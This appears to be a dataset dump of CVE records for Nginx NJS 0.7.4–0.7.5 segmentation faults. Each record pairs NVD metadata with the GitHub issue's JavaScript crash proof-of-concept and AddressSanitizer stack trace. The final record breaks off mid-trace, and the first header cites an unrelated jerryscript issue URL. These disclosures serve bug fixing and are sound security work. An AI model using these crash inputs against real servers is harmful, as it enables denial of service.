2022-08-08T06:14:38Z
https://github.com/jerryscript-project/jerryscript/issues/5008
1,251,957,111
5,008
CVE-2022-34027
2022-07-18T21:15:07.820
Nginx NJS v0.7.4 was discovered to contain a segmentation violation via njs_value_property at njs_value.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/504" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.4:*:*:*:*:*:*:*", "matchCriteriaId": "A12FD5A4-6946-49DD-95D4-154A8DA98F7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/504
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Environment ```OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 6cef7f5055ec24275f0ae121c7f8709ff3e0c454 Version : 0.7.4 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Proof of concept ``` // minified function f() {} Object.defineProperty(f, 'length', {set: () => {}}); Object.defineProperty(f, 'length', Object.getOwnPropertyDescriptor([], 'length')); f.length ``` Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==25984==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004ea634 bp 0x7ffdd4213270 sp 0x7ffdd42130c0 T0) ==25984==The signal is caused by a READ memory access. ==25984==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x4ea634 in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19 #1 0x521273 in njs_object_length /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_object.c:2628:11 #2 0x600a64 in njs_promise_race /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_promise.c:1727:11 #3 0x54c08e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:728:11 #4 0x54a9a7 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:766:16 #5 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23 #6 0x54b526 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:693:11 #7 0x54a9b9 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:769:16 #8 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23 #9 0x4f25ba in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vm.c:541:11 #10 0x4de3fd in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:890:19 #11 0x4dd98f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:619:11 #12 0x4dd98f in main /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:303:15 #13 0x7f7bafed2082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee) #14 0x41ea5d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-asan/build/njs+0x41ea5d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19 in njs_value_property ==25984==ABORTING ``` Credit dramthy(@topsec alpha)
SEGV njs_value.c:1083:19 in njs_value_property
https://api.github.com/repos/nginx/njs/issues/504/comments
0
2022-05-19T08:33:21Z
2022-05-19T23:51:07Z
https://github.com/nginx/njs/issues/504
1,241,429,184
504
CVE-2022-34028
2022-07-18T21:15:07.863
Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/522" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.5:*:*:*:*:*:*:*", "matchCriteriaId": "295D30FC-8B8F-4DF2-92D8-6AECAF06A01B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/522
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Environment ``` Commit : c62a9fb92b102c90a66aa724cb9054183a33a68c Version : 0.7.5 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Proof of concept ``` // Minimizing 811225C4-281E-48F6-8D83-E65B5DB8E211 function placeholder(){} function main() { var v0 = "WbgAtnLEGv"; var v2 = [10000,10000,10000,10000,10000]; var v3 = 0.0; var v4 = undefined; var v6 = v2.includes(); var v7 = 1; var v10 = NaN; var v11 = 3269; var v12 = "toUpperCase"; var v14 = String["fromCharCode"](String,1156435285,String,3269); var v17 = `symbol${String}undefined${v14}number${v14}byteOffset${1156435285}e`["replace"](1156435285,v14); var v19 = Uint8ClampedArray.from(v17); } main(); // CRASH INFO // ========== // TERMSIG: 11 // STDERR: ``` Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==9418==ERROR: AddressSanitizer: SEGV on unknown address 0x62505a68846a (pc 0x000000516e19 bp 0x7ffc9f96e8f0 sp 0x7ffc9f96e890 T0) ==9418==The signal is caused by a READ memory access. #0 0x516e19 in njs_utf8_next /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9 #1 0x516e19 in njs_string_offset /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:2539:17 #2 0x516e19 in njs_string_slice_string_prop /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1512:21 #3 0x5176bf in njs_string_slice /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1544:5 #4 0x4f35dd in njs_string_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:910:16 #5 0x4f189b in njs_object_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:693:27 #6 0x4f189b in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:622:15 #7 0x4ef9fe in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:1058:11 #8 0x63b787 in njs_value_property_i64 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.h:1087:12 #9 0x63b787 in njs_typed_array_from /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:407:15 #10 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11 #11 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16 #12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #13 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11 #14 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16 #15 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #16 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11 #17 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19 #18 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11 #19 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15 #20 0x7f83cfee1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee) #21 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9 in njs_utf8_next ==9418==ABORTING ``` Credit dramthy(@topsec alpha)
SEGV src/njs_utf8.h:52:9 in njs_utf8_next
https://api.github.com/repos/nginx/njs/issues/522/comments
0
2022-06-01T07:38:09Z
2022-06-04T07:21:08Z
https://github.com/nginx/njs/issues/522
1,255,239,687
522
CVE-2022-34029
2022-07-18T21:15:07.910
Nginx NJS v0.7.4 was discovered to contain an out-of-bounds read via njs_scope_value at njs_scope.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/506" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.4:*:*:*:*:*:*:*", "matchCriteriaId": "A12FD5A4-6946-49DD-95D4-154A8DA98F7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/506
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Environment ```OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 9f4ebc96148308a8ce12f2b54432c87e6d78b881 Version : 0.7.4 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Proof of concept ```js // Minimizing 34F6ED23-C193-452B-B724-E62BD7E15360 function placeholder(){} function main() { function v0(v1,v2,v3,v4,...v5) { try { async function v7(v8,v9,v10,v11) { var v12 = await Proxy; } var v13 = v0(); } catch(v14) { } finally { } var v15 = {}; var v16 = /gL8?/; var v17 = {}; var v18 = [v15,v17,v16]; function v20(v21) { v18[1866532165] = Map; } async function v24(v25,v26) { var v27 = await Map; } function v28(v29,v30) { } var v32 = new Promise(v28); var v34 = v32["catch"](); var v37 = {"get":Promise,"set":v24}; var v38 = Object.defineProperty(v34,"constructor",v37); async function v39(v40,v41) { var v42 = await v38; } var v43 = v39(); var v44 = v20(Map); } var v45 = v0(); } main(); ``` Minified ```js function run_then() {} function f(n) { if (n == 2) { return; } try { f(n + 1); } catch(e) { } var p = new Promise(run_then); Object.defineProperty(p, "constructor", {get: () => ({}).a.a}); async function g() { await p; } g(); throw 'QQ'; } f(0); ``` Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004ff20b bp 0x7ffc7abf6030 sp 0x7ffc7abf5880 T0) ==815==The signal is caused by a READ memory access. ==815==Hint: address points to the zero page. #0 0x4ff20b in njs_scope_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 #1 0x4ff20b in njs_scope_valid_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:84:13 #2 0x4ff20b in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:155:13 #3 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11 #4 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19 #5 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11 #6 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15 #7 0x7f8dc7694082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee) #8 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 in njs_scope_value ==815==ABORTING ``` Credit dramthy(@topsec alpha)
SEGV njs_scope.h:74:12 Out-of-bounds Read in njs_scope_value
https://api.github.com/repos/nginx/njs/issues/506/comments
2
2022-05-30T02:09:28Z
2022-06-02T23:34:07Z
https://github.com/nginx/njs/issues/506
1,252,090,775
506
CVE-2022-34030
2022-07-18T21:15:07.953
Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_djb_hash at src/njs_djb_hash.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/540" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.5:*:*:*:*:*:*:*", "matchCriteriaId": "295D30FC-8B8F-4DF2-92D8-6AECAF06A01B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/540
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Environment ```OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : c756e23eb09dac519fe161c88587cc034306630f (high:1882) Version : 0.7.5 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Proof of concept ``` // Minimizing 8AC3654E-F5A1-405C-B380-951904AD058C function placeholder(){} function main() { var v1 = Function; var v6 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185]; var v8 = [v6,1050462187]; var v11 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185]; var v13 = [v11,1050462187]; var v15 = v11.__proto__; function v16(v17,v18,v19,...v20) { var v21 = [v17,-1000000000000.0]; function v22(v23,v24,v25,...v26) { var v27 = {"d":v22}; var v28 = Object.defineProperty(v15,v18,v27); } var v30 = v21["find"](v22); } var v32 = v13["find"](v16); var v34 = v6.__proto__; function v35(v36,v37,v38,...v39) { 'use strict'; var v40 = [v36,-1000000000000.0]; var v42 = 471270.459031428 in v39; var v43 = 1000.0; var v45 = String.fromCodePoint(); var v46 = -128; var v50 = `YVySS90U8G${v45}string${-452883207}-2${Uint8Array}dotAll`.indexOf(); var v51 = 50691; var v52 = 658545.3967616097; var v53 = undefined; var v54 = -1.7976931348623157e+308; var v55 = 2147483647; var v56 = 4184750072; var v57 = "toString"; var v58 = Float64Array; var v59 = "a"; var v60 = 54444; var v61 = ["c14RHVOudV",1050462187]; function v62(v63,v64,v65,...v66) { var v68 = v34["shift"](); } var v70 = v61["find"](v62); function v71(v72,v73,v74,...v75) { 'use strict'; var v76 = {"get":v71}; var v77 = Object.defineProperty(v34,35017,v76); } var v79 = v40["find"](v71); } var v81 = v8["find"](v35); } main(); // CRASH INFO // ========== // TERMSIG: 11 // STDERR: ``` Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==2802==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004e312b bp 0x7ffca2668c70 sp 0x7ffca2668c40 T0) ==2802==The signal is caused by a READ memory access. ==2802==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x4e312b in njs_djb_hash /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16 #1 0x4f10cb in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:618:32 #2 0x502d6a in njs_vmcode_property_in /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1431:11 #3 0x502d6a in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:492:23 #4 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11 #5 0x573a55 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16 #6 0x573a55 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11 #7 0x560b05 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12 #8 0x560b05 in njs_array_iterator_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:1918:12 #9 0x560b05 in njs_array_handler_find /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2025:11 #10 0x65b9ea in njs_object_iterate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_iterator.c #11 0x554e0f in njs_array_prototype_iterator /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2297:11 #12 0x57599e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:739:11 #13 0x573d0c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:777:16 #14 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #15 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11 #16 0x573d3f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16 #17 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11 #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19 #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11 #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15 #22 0x7f1db1e4a082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee) #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16 in njs_djb_hash ==2802==ABORTING ``` Credit dramthy(@topsec alpha)
SEGV src/njs_djb_hash.c:21:16 in njs_djb_hash
https://api.github.com/repos/nginx/njs/issues/540/comments
0
2022-06-10T02:31:55Z
2022-06-11T07:17:08Z
https://github.com/nginx/njs/issues/540
1,266,924,732
540
CVE-2022-34031
2022-07-18T21:15:07.997
Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_value_to_number at src/njs_value_conversion.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/523" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.5:*:*:*:*:*:*:*", "matchCriteriaId": "295D30FC-8B8F-4DF2-92D8-6AECAF06A01B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/523
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Environment ``` Commit : c62a9fb92b102c90a66aa724cb9054183a33a68c Version : 0.7.5 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Proof of concept ``` // Minimizing 74595E5A-F4AD-43DB-A4E9-34F2D366AD8A function placeholder(){} function main() { var v0 = /gL8?/; var v1 = {}; var v2 = [v1,v1,v0]; function v4(v5) { v2[1866532165] = undefined; } function v6(v7,v8) { function v10(v11) { v11[-4294967297] = Map; } var v13 = new Uint16Array(v2); } v1.valueOf = v4; var v15 = typeof Map; var v17 = typeof Map; var v19 = new Promise(v6); } main(); // CRASH INFO // ========== // TERMSIG: 11 // STDERR: ``` Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==7855==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000063545b bp 0x7ffeac888710 sp 0x7ffeac8884e0 T0) ==7855==The signal is caused by a READ memory access. ==7855==Hint: address points to the zero page. #0 0x63545b in njs_value_to_number /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9 #1 0x63545b in njs_typed_array_alloc /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:171:19 #2 0x63a56b in njs_typed_array_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:229:13 #3 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11 #4 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16 #5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #6 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11 #7 0x573b65 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16 #8 0x573b65 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11 #9 0x648ed3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12 #10 0x648ed3 in njs_promise_constructor_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:214:11 #11 0x648ed3 in njs_promise_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:164:15 #12 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11 #13 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16 #14 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #15 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11 #16 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16 #17 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11 #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19 #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11 #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15 #22 0x7f8daaa33082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee) #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9 in njs_value_to_number ==7855==ABORTING ``` Credit dramthy(@topsec alpha)
SEGV src/njs_value_conversion.h:17:9 in njs_value_to_number
https://api.github.com/repos/nginx/njs/issues/523/comments
0
2022-06-01T07:38:49Z
2022-06-04T07:21:08Z
https://github.com/nginx/njs/issues/523
1,255,241,021
523
CVE-2022-34032
2022-07-18T21:15:08.040
Nginx NJS v0.7.5 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/524" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.5:*:*:*:*:*:*:*", "matchCriteriaId": "295D30FC-8B8F-4DF2-92D8-6AECAF06A01B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/524
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Environment ``` Commit : c62a9fb92b102c90a66aa724cb9054183a33a68c Version : 0.7.5 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Proof of concept ``` // Minimizing 9159992D-C762-4DEB-8981-8A3357935A7A function placeholder(){} function main() { var v2 = []; var v4 = {"get":Number}; var v6 = Object.defineProperty(v2,29425,v4); var v7 = AggregateError(v6); Object.e = v7; var v9 = Promise(); } main(); // CRASH INFO // ========== // TERMSIG: 11 // STDERR: ``` Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==8116==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004eed5c bp 0x7ffcc19b6310 sp 0x7ffcc19b61e0 T0) ==8116==The signal is caused by a READ memory access. ==8116==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x4eed5c in njs_value_own_enumerate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21 #1 0x53a37f in njs_object_traverse /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:1230:23 #2 0x5a16ed in njs_builtin_match_native_function /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_builtin.c:776:11 #3 0x592ad4 in njs_add_backtrace_entry /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:1308:15 #4 0x592ad4 